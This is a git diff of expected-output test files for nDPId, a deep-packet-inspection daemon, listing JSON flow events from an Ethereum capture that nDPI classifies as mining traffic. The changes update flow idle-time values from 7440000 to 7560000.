00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":86968,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":74,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":432,"global_ts_msec":1578508366135} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 diff --git a/test/results/ethernetIP.pcap.out b/test/results/ethernetIP.pcap.out index 727a6589b..0ce13ac1d 100644 --- a/test/results/ethernetIP.pcap.out +++ b/test/results/ethernetIP.pcap.out @@ -1,29 +1,29 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ethernetIP.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1352718180263} 